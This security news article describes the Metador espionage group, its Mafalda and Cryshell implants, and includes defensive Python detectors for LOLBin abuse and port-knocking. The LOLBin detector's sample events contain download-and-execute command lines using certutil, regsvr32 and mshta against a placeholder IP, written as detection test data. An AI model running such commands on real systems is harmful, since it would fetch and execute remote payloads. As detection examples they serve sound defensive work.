Security firm Sentinel Labs has discovered a new threat group that is targeting telecommunications companies, internet service providers (ISPs), and universities, primarily in Africa and the Middle East. According to the published report, the advanced threat group has been active for two years and focuses on long-term persistence for cyber espionage.
The group was discovered somewhat accidentally following an analysis of a telecommunication company’s network based in the Middle East, which had already suffered intrusions from advanced threat groups MuddyWater and Moshen Dragon, Iranian and Chinese state-sponsored groups respectively.
Metador activity was uncovered when researchers noticed an unusual LOLBin that proved to be the root of an intricate infection chain that would yield two in-memory malware platforms and indications of additional Linux implants.
LOLBins, or Living Off the Land Binaries, are legitimate binaries that ship with the operating system and that attackers later realised could be repurposed to hide malicious activity.
They are typically used to gain persistence or escalate privileges; more recently, these preinstalled local system binaries have also been used to evade detection and to aid malware delivery.
Metador's abuse of LOLBin tactics is therefore no surprise, given the group's focus on persistence and on remaining undetected for extended periods. Unsurprising as it is, it shows the group to be highly skilled and one that should be regarded as a threat.
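Because a LOLBin is a legitimate system binary, detecting its abuse means looking at how it is invoked rather than at the file itself. The following is an added illustration of that idea, not code from the article or from Sentinel Labs: a small heuristic detector run over constructed process-creation events (the `Image|CommandLine|ParentImage` record format, the sample lines, the TEST-NET address and the short binary list are all assumptions made for the example, and the article does not say which LOLBin Metador used).

```python
"""Heuristic LOLBin-abuse detection over process-creation events.

Added example for this article, not Sentinel Labs code. The event format,
the sample events and the small binary list are constructed; real
deployments would feed Sysmon/EDR events and a fuller LOLBAS catalogue.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Small subset of well-known Living Off the Land binaries (lower-case basenames).
LOLBINS = {"certutil.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe",
           "bitsadmin.exe", "wmic.exe", "msiexec.exe", "cmstp.exe"}

# Parents from which a LOLBin launch is rarely legitimate (constructed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "w3wp.exe"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class Event:
    image: str
    command_line: str
    parent_image: str


def parse_event(line: str) -> Event:
    """Parse a constructed 'Key=Value|Key=Value' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return Event(fields["Image"],
                 fields.get("CommandLine", ""),
                 fields.get("ParentImage", ""))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Event) -> List[str]:
    """Return the reasons an event looks like LOLBin abuse; empty means benign."""
    name = basename(ev.image)
    if name not in LOLBINS:
        return []
    reasons = []
    cmd = ev.command_line.lower()
    # A system utility handed a remote URL is a common download-cradle pattern.
    if URL_RE.search(cmd):
        reasons.append(f"{name} given a remote URL")
    # certutil's cache/decode switches are how it gets turned into a downloader.
    if name == "certutil.exe" and ("-urlcache" in cmd or "-decode" in cmd):
        reasons.append("certutil used to fetch or decode a payload")
    # Office or web-server processes should not be spawning these utilities.
    if basename(ev.parent_image) in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {basename(ev.parent_image)}")
    return reasons


def detect(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run the heuristics over raw event lines and return (binary, reasons) alerts."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            alerts.append((basename(ev.image), reasons))
    return alerts


# Constructed sample events: one benign service, one benign certutil use,
# and three invocations that a defender would want surfaced.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k netsvcs|ParentImage=C:\Windows\System32\services.exe",
    r"Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -verify server.cer|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -urlcache -split -f http://203.0.113.10/update.dat update.dat|ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE",
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:http://203.0.113.10/loader.sct scrobj.dll|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://203.0.113.10/page.hta|ParentImage=C:\Windows\explorer.exe",
]

if __name__ == "__main__":
    for binary, reasons in detect(SAMPLE_EVENTS):
        print(binary, "->", "; ".join(reasons))
```

The benign `certutil -verify` invocation produces no alert, which is the point: the binary name alone is not a signal, and a rule that fires on every certutil launch would be tuned out within a day. Pairing the binary with its arguments and its parent is what separates a download cradle from an administrator's normal work.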
Metador has also been seen to drop Windows-based malware going by the name Mafalda, which is capable of operating solely from memory. Along with Mafalda, researchers detected an unknown Linux malware and a custom implant called Cryshell.
The custom implant is used for bouncing connections in an internal network to external command-and-control servers, with support for custom port knocking sequences.
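A port-knocking implant only opens (or forwards) a connection after the client has hit a pre-arranged sequence of closed ports, so on the wire the tell-tale is a burst of rejected probes to several ports on one host from one source, immediately followed by an accepted connection to that host. The block below is an added example, not code from the article or from Sentinel Labs, and it does not model Cryshell's actual sequence, which the article does not disclose: it applies that generic heuristic to constructed firewall log lines (the `timestamp ACTION src -> dst:port` format, the 10-second window and the three-knock threshold are assumptions).

```python
"""Detect port-knock-style sequences in constructed firewall logs.

Added example for this article, not Sentinel Labs code. Heuristic: a source
sends DENY-logged probes to at least MIN_KNOCKS distinct ports on one host
within WINDOW_SECONDS, then gets an ALLOW to the same host. A plain port
scan trips the first half only; the accepted follow-up connection is what
distinguishes knock-then-connect behaviour.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

WINDOW_SECONDS = 10   # assumption: knocks and the follow-up connect land within 10 s
MIN_KNOCKS = 3        # assumption: fewer distinct probed ports is treated as noise


def parse_line(line: str):
    """Parse a constructed line such as '2022-09-22T10:00:01 DENY 10.0.0.5 -> 10.0.0.20:7000'."""
    ts, action, rest = line.strip().split(" ", 2)
    src, dst = rest.split(" -> ")
    host, port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), action, src, host, int(port)


def find_knock_sequences(lines: List[str],
                         window: int = WINDOW_SECONDS,
                         min_knocks: int = MIN_KNOCKS) -> List[Dict]:
    """Return one finding per ALLOW that was preceded by a qualifying knock burst."""
    by_pair = defaultdict(list)
    # Sorting the parsed tuples orders them by timestamp (first element).
    for ts, action, src, host, port in sorted(parse_line(l) for l in lines):
        by_pair[(src, host)].append((ts, action, port))

    findings = []
    for (src, host), events in by_pair.items():
        for i, (ts, action, port) in enumerate(events):
            if action != "ALLOW":
                continue
            # Denied probes from this source to this host inside the window.
            recent_denies = [(t, p) for (t, a, p) in events[:i]
                             if a == "DENY" and (ts - t).total_seconds() <= window]
            knock_ports: List[int] = []
            for _, p in recent_denies:
                if p not in knock_ports:
                    knock_ports.append(p)          # keep first-seen order
            if len(knock_ports) >= min_knocks:
                findings.append({"src": src, "dst": host,
                                 "knocks": knock_ports, "opened_port": port})
    return findings


# Constructed sample log: one knock sequence, one ordinary HTTPS session,
# one isolated deny, and a three-port scan with no follow-up connection.
SAMPLE_LOG = [
    "2022-09-22T10:00:01 DENY 10.0.0.5 -> 10.0.0.20:7000",
    "2022-09-22T10:00:02 DENY 10.0.0.5 -> 10.0.0.20:8000",
    "2022-09-22T10:00:03 DENY 10.0.0.5 -> 10.0.0.20:9000",
    "2022-09-22T10:00:05 ALLOW 10.0.0.5 -> 10.0.0.20:22",
    "2022-09-22T10:00:10 ALLOW 10.0.0.7 -> 10.0.0.20:443",
    "2022-09-22T10:00:00 DENY 10.0.0.9 -> 10.0.0.21:445",
    "2022-09-22T10:00:30 ALLOW 10.0.0.9 -> 10.0.0.21:80",
    "2022-09-22T10:01:00 DENY 10.0.0.11 -> 10.0.0.22:21",
    "2022-09-22T10:01:01 DENY 10.0.0.11 -> 10.0.0.22:23",
    "2022-09-22T10:01:02 DENY 10.0.0.11 -> 10.0.0.22:25",
]

if __name__ == "__main__":
    for f in find_knock_sequences(SAMPLE_LOG):
        print(f"{f['src']} knocked {f['knocks']} on {f['dst']}, then connected to :{f['opened_port']}")
```

The detector needs both halves of the picture: deny logging on the perimeter or host firewall so the knocks are visible at all, and accept logging so the follow-up connection can be tied to them. Environments that log only denies will see the probes but never the confirmation.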
As for other tactics employed by the threat group, researchers noted that,
“Part of the difficulty in tracking the breadth of Metador’s operations involves their strict adherence to infrastructure segmentation. The attackers use a single IP per victim and build…Attributing Metador remains a garbled mystery. We encountered multiple languages, with diverse idiosyncrasies indicative of multiple developers. There are indications of a separation between developers and operators, and despite a lack of samples, the version history for at least one of the platforms suggests a history of development that extends far beyond the intrusions we’ve uncovered.”
Complex Attack Pattern
In providing a broad technical overview of Metador's attack tactics, researchers noted that at the time their report and accompanying blog article were published, the original attack vector could not be determined.
This is primarily because the company's infrastructure had been infected long before Sentinel One was engaged to protect it. However, researchers discovered that Metador operators can choose between multiple execution flows to load any one of the group's modular malicious frameworks.
Researchers saw the attackers deploy a backdoor called metaMain to decrypt Mafalda into memory. metaMain itself is implanted in memory, further complicating any kind of detection. Regarding Mafalda researchers stated,
“Mafalda is a flexible interactive implant, supporting over 60 commands. It appears to be a highly-valuable asset to the Metador operators, with newer variants exhibiting intense obfuscation making them challenging to analyze.”
Mafalda's commands cover credential theft, data and information theft, command execution, system registry and file system manipulation, and reconfiguring the malware itself when needed.
As previously mentioned, Metador attacks use a single external IP address per victim network. That IP address serves as the command-and-control endpoint over either HTTP or TCP.
The servers were all hosted with a Dutch hosting provider, LITESERVER. Researchers also found some of the infrastructure exposing SSH on an unusual port, which they believe was used to tunnel traffic for specific Mafalda internal commands.
Given all the information that has been released to the public, it is little wonder Sentinel One has highlighted the difficulties in attributing Metador attacks.
What can be determined is that the threat group's primary activity is espionage and the group's skillset lies in securing and maintaining persistence on the target infrastructure.
Researchers further noted that internal documentation suggests the implant is maintained and developed by a dedicated team that leaves comments for a separate group of operators.
Sentinel One concluded that,
“Running into Metador is a daunting reminder that a different class of threat actors continues to operate in the shadows with impunity. Previous threat intelligence discoveries have broadened our understanding of the kind of threats that are out there but so far, our collective ability to track these actors remains inconsistent at best. Developers of security products in particular should take this as an opportunity to proactively engineer their solutions towards monitoring for the most cunning, well-resourced threat actors. High-end threat actors are thriving in a market that primarily rewards compliance and perfunctory detections.”